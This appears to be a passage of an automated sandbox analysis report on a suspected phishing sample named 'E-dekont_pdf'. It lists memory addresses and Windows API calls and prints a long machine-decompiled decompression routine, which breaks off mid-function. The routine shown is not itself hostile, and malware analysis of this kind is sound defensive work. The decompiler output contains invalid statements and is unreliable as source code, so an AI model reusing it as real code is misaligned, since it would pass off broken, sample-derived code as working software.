                                                                                              0x6f1324f6
                                                                                              0x6f1324f8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1324fe
                                                                                              0x00000000
                                                                                              0x6f1324fe
                                                                                              0x6f13252d
                                                                                              0x6f132532
                                                                                              0x6f132534
                                                                                              0x00000000
                                                                                              0x6f132534
                                                                                              0x6f132508
                                                                                              0x6f13250e
                                                                                              0x6f13250f
                                                                                              0x6f132516
                                                                                              0x6f13251a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f13251c
                                                                                              0x6f13251e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f132520
                                                                                              0x6f1323d7
                                                                                              0x6f1323da
                                                                                              0x6f132441
                                                                                              0x6f132446
                                                                                              0x6f13244b
                                                                                              0x6f132451
                                                                                              0x6f132459
                                                                                              0x6f132459
                                                                                              0x6f13245a
                                                                                              0x6f13245a
                                                                                              0x6f132462
                                                                                              0x6f132467
                                                                                              0x6f13246b
                                                                                              0x6f13246d
                                                                                              0x6f132472
                                                                                              0x6f13247a
                                                                                              0x6f13247f
                                                                                              0x6f132481
                                                                                              0x6f132486
                                                                                              0x6f13248c
                                                                                              0x6f132492
                                                                                              0x6f132495
                                                                                              0x6f13249a
                                                                                              0x6f13249f
                                                                                              0x6f1324a4
                                                                                              0x6f1324a4
                                                                                              0x6f1324ac
                                                                                              0x6f1324ae
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1324b4
                                                                                              0x6f1324b4
                                                                                              0x00000000
                                                                                              0x6f1324b4
                                                                                              0x6f1323dc
                                                                                              0x6f1323df
                                                                                              0x6f1323fe
                                                                                              0x6f132402
                                                                                              0x6f132408
                                                                                              0x6f13240d
                                                                                              0x6f132415
                                                                                              0x6f13241a
                                                                                              0x6f13241c
                                                                                              0x6f132421
                                                                                              0x6f132427
                                                                                              0x6f13242d
                                                                                              0x6f132430
                                                                                              0x6f132435
                                                                                              0x6f13243a
                                                                                              0x00000000
                                                                                              0x6f13243a
                                                                                              0x6f1323e4
                                                                                              0x00000000
                                                                                              0x6f1323ea
                                                                                              0x6f1323ec
                                                                                              0x6f1323f5
                                                                                              0x00000000
                                                                                              0x6f1323f5
                                                                                              0x6f1323e4
                                                                                              0x6f132a44
                                                                                              0x6f132a4a
                                                                                              0x6f132a50
                                                                                              0x6f132a54
                                                                                              0x6f132bd0
                                                                                              0x6f132bd9
                                                                                              0x6f132a68
                                                                                              0x6f132a6a
                                                                                              0x6f132a6d
                                                                                              0x6f132af7
                                                                                              0x6f132af7
                                                                                              0x6f132afa
                                                                                              0x6f132afd
                                                                                              0x6f132b1a
                                                                                              0x6f132b20
                                                                                              0x6f132b26
                                                                                              0x6f132b28
                                                                                              0x6f132b3f
                                                                                              0x6f132b3f
                                                                                              0x6f132b3f
                                                                                              0x6f132b47
                                                                                              0x6f132b4c
                                                                                              0x6f132b54
                                                                                              0x6f132b56
                                                                                              0x6f132b5a
                                                                                              0x6f132b5b
                                                                                              0x6f132b5e
                                                                                              0x6f132b60
                                                                                              0x6f132b67
                                                                                              0x6f132b6d
                                                                                              0x6f132b6f
                                                                                              0x6f132b71
                                                                                              0x6f132b76
                                                                                              0x6f132b88
                                                                                              0x6f132b88
                                                                                              0x6f132b76
                                                                                              0x6f132b6f
                                                                                              0x6f132b5e
                                                                                              0x6f132b8e
                                                                                              0x6f132b92
                                                                                              0x6f132b9c
                                                                                              0x6f132ba4
                                                                                              0x6f132bb1
                                                                                              0x6f132bb8
                                                                                              0x6f132bba
                                                                                              0x6f132bc4
                                                                                              0x6f132bca
                                                                                              0x6f132bca
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f132bcc
                                                                                              0x6f132bcc
                                                                                              0x6f132bcc
                                                                                              0x6f132bcc
                                                                                              0x00000000
                                                                                              0x6f132bcc
                                                                                              0x6f132bbc
                                                                                              0x6f132bbc
                                                                                              0x00000000
                                                                                              0x6f132b94
                                                                                              0x6f132b94
                                                                                              0x6f132b9a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f132b9a
                                                                                              0x6f132b92
                                                                                              0x6f132b2b
                                                                                              0x6f132b31
                                                                                              0x6f132b37
                                                                                              0x6f132b39
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f132b39
                                                                                              0x6f132aff
                                                                                              0x6f132b06
                                                                                              0x6f132b0c
                                                                                              0x6f132b12
                                                                                              0x00000000
                                                                                              0x6f132b12
                                                                                              0x6f132a73
                                                                                              0x6f132a76
                                                                                              0x6f132adc
                                                                                              0x6f132adc
                                                                                              0x6f132ae2
                                                                                              0x6f132ae5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f132aeb
                                                                                              0x6f132aec
                                                                                              0x00000000
                                                                                              0x6f132af1
                                                                                              0x6f132a7b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f132a81
                                                                                              0x6f132a81
                                                                                              0x6f132a84
                                                                                              0x6f132a8a
                                                                                              0x6f132a8c
                                                                                              0x6f132a95
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f132a9c
                                                                                              0x6f132aa7
                                                                                              0x6f132ab0
                                                                                              0x6f132ab6
                                                                                              0x6f132abc
                                                                                              0x6f132ac2
                                                                                              0x6f132ad5
                                                                                              0x00000000
                                                                                              0x6f132ad5

                                                                                              APIs
                                                                                                • Part of subcall function 6F1312F8: GlobalAlloc.KERNELBASE(00000040,?,6F1311C4,-000000A0), ref: 6F131302
                                                                                              • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6F13294E
                                                                                              • lstrcpyW.KERNEL32(00000008,?), ref: 6F1329A4
                                                                                              • lstrcpyW.KERNEL32(00000808,?), ref: 6F1329AF
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F1329C0
                                                                                              • GlobalFree.KERNEL32(?), ref: 6F132A44
                                                                                              • GlobalFree.KERNELBASE(?), ref: 6F132A4A
                                                                                              • GlobalFree.KERNELBASE(?), ref: 6F132A50
                                                                                              • GetModuleHandleW.KERNEL32(00000008), ref: 6F132B1A
                                                                                              • LoadLibraryW.KERNEL32(00000008), ref: 6F132B2B
                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 6F132B82
                                                                                              • lstrlenW.KERNEL32(00000808), ref: 6F132B9D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77216589547.000000006F131000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F130000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77216556616.000000006F130000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77216631683.000000006F134000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77216670009.000000006F136000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_6f130000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 1042148487-0
                                                                                              • Opcode ID: 92f5fd8f0210b1fae2e9158cacd0cdee9b18d9c169989e9e62d9791003ac8c84
                                                                                              • Instruction ID: e056680e8a1650b9cd5854c9c49620d9b4647e45cbb3b83b396fa9b686567470
                                                                                              • Opcode Fuzzy Hash: 92f5fd8f0210b1fae2e9158cacd0cdee9b18d9c169989e9e62d9791003ac8c84
                                                                                              • Instruction Fuzzy Hash: C642C273E483A29FD314EF38855079AB7E0FF99390F104A2EE499D6284D770E5648BD2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 98%
                                                                                              			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__ebx = __edx + 1;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											__ebx = __edx + 1;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_push("true");
									_pop(_t568);
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
